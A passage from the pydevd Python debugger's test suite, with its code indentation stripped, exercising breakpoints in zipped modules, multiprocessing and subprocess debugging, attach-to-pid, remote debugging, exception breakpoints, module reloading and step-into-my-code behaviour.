curr_pythonpath = env.get('PYTHONPATH', '')
curr_pythonpath = str(tmpdir.join('myzip.zip')) + os.pathsep + curr_pythonpath
curr_pythonpath = str(tmpdir.join('myzip2.egg!')) + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
env["IDE_PROJECT_ROOTS"] = str(tmpdir.join('myzip.zip'))
return env
import zipfile
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip.zip')), 'w')
zip_file.writestr('zipped/__init__.py', '')
zip_file.writestr('zipped/zipped_contents.py', 'def call_in_zip():\n return 1')
zip_file.close()
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip2.egg!')), 'w')
zip_file.writestr('zipped2/__init__.py', '')
zip_file.writestr('zipped2/zipped_contents2.py', 'def call_in_zip2():\n return 1')
zip_file.close()
with case_setup.test_file('_debugger_case_zip_files.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip.zip')), 'zipped', 'zipped_contents.py')
)
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip2.egg!')), 'zipped2', 'zipped_contents2.py')
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip'
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip2'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('file_to_check', [
'_debugger_case_multiprocessing.py',
'_debugger_case_python_c.py',
'_debugger_case_multiprocessing_pool.py'
])
def test_multiprocessing_simple(case_setup_multiprocessing, file_to_check):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file(file_to_check) as writer:
break1_line = writer.get_line_index_with_content('break 1 here')
break2_line = writer.get_line_index_with_content('break 2 here')
writer.write_add_breakpoint(break1_line)
writer.write_add_breakpoint(break2_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
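            # Accepts the debugger connection(s) opened by the child process on the shared
            # server socket, mirrors the breakpoints on that connection and resumes the
            # child once it stops on one of them.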
def run(self):
from tests_python.debugger_unittest import ReaderThread
expected_connections = 1
if sys.platform != 'win32' and IS_PY2 and file_to_check == '_debugger_case_python_c.py':
                    # Note: on Linux on Python 2, CPython's subprocess.call will actually
                    # create a fork first (at which point it'll connect) and only later
                    # call the main script (as if it were a clean process where PyDB hadn't
                    # been created the first time -- the debugger still works, but it makes
                    # an additional connection).
expected_connections = 2
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break1_line)
writer2.write_add_breakpoint(break2_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_multiprocessing_with_stopped_breakpoints(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_multiprocessing_stopped_threads.py') as writer:
break_main_line = writer.get_line_index_with_content('break in main here')
break_thread_line = writer.get_line_index_with_content('break in thread here')
break_process_line = writer.get_line_index_with_content('break in process here')
writer.write_add_breakpoint(break_main_line)
writer.write_add_breakpoint(break_thread_line)
writer.write_add_breakpoint(break_process_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_main_line)
writer2.write_add_breakpoint(break_thread_line)
writer2.write_add_breakpoint(break_process_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit() # Breaks in thread.
writer.write_step_over(hit2.thread_id)
hit2 = writer.wait_for_breakpoint_hit(REASON_STEP_OVER) # line == event.set()
        # Paused on the breakpoint; stepping over will start the process and also pause
        # the main thread in the main process.
writer.write_step_over(hit2.thread_id)
# Note: ignore the step over hit (go only for the breakpoint hit).
main_hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.write_run_thread(main_hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_subprocess_quoted_args(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_quoting.py') as writer:
break_subprocess_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_subprocess_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
                # Note: on Linux on Python 2, CPython's subprocess.call will actually
                # create a fork first (at which point it'll connect) and only later
                # call the main script (as if it were a clean process where PyDB hadn't
                # been created the first time -- the debugger still works, but it makes
                # an additional connection).
expected_connections = 1
if sys.platform != 'win32' and IS_PY2:
expected_connections = 2
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_subprocess_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.finished_ok = True
def _attach_to_writer_pid(writer):
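    # Attach pydevd to the already-running test process: run attach_pydevd.py against its
    # pid/port in a background thread and wait until the writer reports initialization finished.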
import pydevd
assert writer.process is not None
def attach():
attach_pydevd_file = os.path.join(os.path.dirname(pydevd.__file__), 'pydevd_attach_to_process', 'attach_pydevd.py')
subprocess.call([sys.executable, attach_pydevd_file, '--pid', str(writer.process.pid), '--port', str(writer.port)])
threading.Thread(target=attach).start()
wait_for_condition(lambda: writer.finished_initialization)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_attach_to_pid_no_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_simple.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize to get to the while loop.
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_attach_to_pid_halted(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_multiple_threads.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize and get to the proper halting condition
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break thread here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_basic(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote.py') as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote_threads.py') as writer:
writer.write_make_initial_run()
hit_in_main = writer.wait_for_breakpoint_hit()
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
# Break in the 2 threads.
hit_in_thread1 = writer.wait_for_breakpoint_hit(line=bp_line)
hit_in_thread2 = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit_in_thread1.thread_id, hit_in_thread1.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_change_variable(hit_in_thread2.thread_id, hit_in_thread2.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit_in_main.thread_id)
writer.write_run_thread(hit_in_thread1.thread_id)
writer.write_run_thread(hit_in_thread2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_breakpoint_remote.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
filename='_debugger_case_breakpoint_remote.py',
line=13,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote_no_import(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.join(
os.path.dirname(writer.get_pydevd_file()),
'pydev_sitecustomize')
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
with case_setup_remote.test_file(
'_debugger_case_breakpoint_remote_no_import.py',
get_environ=get_environ) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
"108",
filename='_debugger_case_breakpoint_remote_no_import.py',
line=12,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_multi_proc(case_setup_remote):
class _SecondaryMultiProcProcessWriterThread(debugger_unittest.AbstractWriterThread):
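        # Minimal writer for the second process: accept its connection, send the version and
        # the initial run command -- we only care that the second connection actually arrives.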
FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
def __init__(self, server_socket):
debugger_unittest.AbstractWriterThread.__init__(self)
self.server_socket = server_socket
def run(self):
print('waiting for second process')
self.sock, addr = self.server_socket.accept()
print('accepted second process')
from tests_python.debugger_unittest import ReaderThread
self.reader_thread = ReaderThread(self.sock)
self.reader_thread.start()
self._sequence = -1
# initial command is always the version
self.write_version()
self.log.append('start_socket')
self.write_make_initial_run()
time.sleep(.5)
self.finished_ok = True
def do_kill(writer):
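        # Besides the regular teardown, also kill the secondary process writer (if one was created).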
debugger_unittest.AbstractWriterThread.do_kill(writer)
if hasattr(writer, 'secondary_multi_proc_process_writer'):
writer.secondary_multi_proc_process_writer.do_kill()
with case_setup_remote.test_file(
'_debugger_case_remote_1.py',
do_kill=do_kill,
EXPECTED_RETURNCODE='any'
) as writer:
        # This sometimes becomes flaky on the CI because the process outlives the writer thread...
        # As we're only interested in knowing whether a second connection was received, just kill
        # the related process.
assert hasattr(writer, 'FORCE_KILL_PROCESS_WHEN_FINISHED_OK')
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.secondary_multi_proc_process_writer = secondary_multi_proc_process_writer = \
_SecondaryMultiProcProcessWriterThread(writer.server_socket)
secondary_multi_proc_process_writer.start()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
for _i in xrange(400):
if secondary_multi_proc_process_writer.finished_ok:
break
time.sleep(.1)
else:
writer.log.append('Secondary process not finished ok!')
raise AssertionError('Secondary process not finished ok!')
writer.log.append('Secondary process finished!')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.parametrize('handle', [True, False])
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_unhandled_exceptions(case_setup_remote, handle):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
# Add, remove and add back
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
writer.write_remove_exception_breakpoint('Exception')
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
if not handle:
writer.write_remove_exception_breakpoint('Exception')
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
if handle:
writer.log.append('waiting for uncaught exception')
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('finished ok')
writer.finished_ok = True
def test_trace_dispatch_correct(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['PYDEVD_USE_FRAME_EVAL'] = 'NO' # This test checks trace dispatch (so, disable frame eval).
return env
with case_setup.test_file('_debugger_case_trace_dispatch.py', get_environ=get_environ) as writer:
breakpoint_id = writer.write_add_breakpoint(5, 'method')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_PY26, reason='Failing on Python 2.6 on travis (needs investigation).')
def test_case_single_notification_on_step(case_setup):
from tests_python.debugger_unittest import REASON_STEP_INTO
with case_setup.test_file('_debugger_case_import_main.py') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), '')
writer.write_make_initial_run()
hit = writer.wait_for_single_notification_as_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_reload(case_setup, tmpdir):
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
for line in (
'pydev debugger: Start reloading module: "my_temp2"',
'pydev debugger: Updated function code: <function call',
'pydev debugger: reload finished',
):
if line not in stderr:
                raise AssertionError('"%s" not in stderr.\nstdout:\n%s\n\nstderr:\n%s' % (
                    line, stdout, stderr))
path = tmpdir.join('my_temp.py')
path.write('''
import my_temp2
assert my_temp2.call() == 1
a = 10 # break here
assert my_temp2.call() == 2
print('TEST SUCEEDED!')
''')
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 1
''')
with case_setup.test_file(str(path), additional_output_checks=additional_output_checks) as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 2
''')
writer.write_reload('my_temp2')
writer.wait_for_message(CMD_RELOAD_CODE)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working with Jython on ci (needs investigation).')
def test_custom_frames(case_setup):
with case_setup.test_file('_debugger_case_custom_frames.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(3):
writer.write_step_over(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
# Main thread stopped
writer.wait_for_breakpoint_hit(REASON_STEP_OVER)
            # Each time we have an additional custom frame (which is shown as if it
            # were a thread that is created and then suspended).
for _ in range(i):
writer.wait_for_message(CMD_THREAD_CREATE)
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_run_thread(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
writer.finished_ok = True
@pytest.mark.skipif((not (IS_PY36 or IS_PY27)) or IS_JYTHON or IS_PYPY, reason='Gevent only installed on Py36/Py27 for tests.')
def test_gevent(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup.test_file('_debugger_case_gevent.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_return_value(case_setup):
with case_setup.test_file('_debugger_case_return_value.py') as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_show_return_vars()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(name='<module>', line=break_line)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='<module>', line=break_line + 1)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method1" type="int" qualifier="%s" value="int: 1" isRetVal="True"' % (builtin_qualifier,),
'<var name="method1" type="int" value="int%253A 1" isRetVal="True"',
],
])
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='<module>', line=break_line + 2)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method2" type="int" qualifier="%s" value="int: 2" isRetVal="True"' % (builtin_qualifier,),
'<var name="method2" type="int" value="int%253A 2" isRetVal="True"',
],
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
@pytest.mark.parametrize('check_single_notification', [True, False])
def test_run_pause_all_threads_single_notification(case_setup, check_single_notification):
from tests_python.debugger_unittest import TimeoutError
with case_setup.test_file('_debugger_case_multiple_threads.py') as writer:
# : :type writer: AbstractWriterThread
writer.write_multi_threads_single_notification(True)
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread()
thread_id1 = writer.wait_for_new_thread()
thread_id2 = writer.wait_for_new_thread()
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION)
assert dct['thread_id'] in (thread_id1, thread_id2)
assert dct['stop_reason'] == REASON_THREAD_SUSPEND
else:
            # Without the single-notification mode, we should get one thread-suspend event per thread.
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit0.thread_id in (thread_id1, thread_id2)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit1.thread_id in (thread_id1, thread_id2)
with pytest.raises(TimeoutError):
# The main thread should not receive a hit as it's effectively deadlocked until other
# threads finish.
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND, timeout=1)
        # Doing a step in one thread, when paused, should notify on both threads.
writer.write_step_over(thread_id1)
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_RESUME_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
assert dct['stop_reason'] == REASON_STEP_OVER
hit = writer.get_current_stack_hit(thread_id1)
else:
hit = writer.wait_for_breakpoint_hit(CMD_STEP_OVER)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'stop_loop()')
writer.wait_for_evaluation('<var name="stop_loop()" type="str" qualifier="{0}" value="str: stopped_loop'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def scenario_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '0', '1', '0')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '0', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught (but not another time
# in postmortem mode).
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught_and_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '1', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught and another in postmortem mode.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize(
'check_scenario',
[
scenario_uncaught,
scenario_caught,
scenario_caught_and_uncaught,
]
)
def test_top_level_exceptions_on_attach(case_setup_remote, check_scenario):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions2.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
check_scenario(writer)
writer.log.append('finished ok')
writer.finished_ok = True
@pytest.mark.parametrize('filename, break_at_lines', [
    # Known limitation: when a breakpoint is added to the first line of the module,
    # the whole module becomes traced.
('_debugger_case_tracing.py', {2: 'trace'}),
('_debugger_case_tracing.py', {3: 'frame_eval'}),
('_debugger_case_tracing.py', {4: 'frame_eval'}),
('_debugger_case_tracing.py', {2: 'trace', 4: 'trace'}),
('_debugger_case_tracing.py', {8: 'frame_eval'}),
('_debugger_case_tracing.py', {9: 'frame_eval'}),
('_debugger_case_tracing.py', {10: 'frame_eval'}),
# Note: second frame eval hit is actually a trace because after we
# hit the first frame eval we don't actually stop tracing a given
# frame (known limitation to be fixed in the future).
# -- needs a better test
('_debugger_case_tracing.py', {8: 'frame_eval', 10: 'frame_eval'}),
])
def test_frame_eval_limitations(case_setup, filename, break_at_lines):
'''
Test with limitations to be addressed in the future.
'''
with case_setup.test_file(filename) as writer:
for break_at_line in break_at_lines:
writer.write_add_breakpoint(break_at_line)
writer.log.append('making initial run')
writer.write_make_initial_run()
for break_at_line, break_mode in break_at_lines.items():
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
if IS_PY36_OR_GREATER and TEST_CYTHON:
assert hit.suspend_type == break_mode
else:
# Before 3.6 frame eval is not available.
assert hit.suspend_type == 'trace'
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_step_return_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == '<module>'
writer.write_step_return_my_code(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE) # Note: goes from step over to step into
assert hit.name == 'callback1'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE) # Note: goes from step over to step into
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE)
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
writer.finished_ok = True
@pytest.fixture(
params=[
'step_over',
'step_return',
'step_in',
]
)
def step_method(request):
return request.param
def test_sysexit_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/_debugger_case_sysexit.py': True})})
return env
with case_setup.test_file('_debugger_case_sysexit.py', get_environ=get_environ, EXPECTED_RETURNCODE=1) as writer:
writer.write_add_exception_breakpoint_with_policy(
'SystemExit',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("scenario", [
'handled_once',
'handled_multiple',
'unhandled',
])
def test_exception_not_on_filtered_file(case_setup, scenario):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
if scenario == 'handled_once':
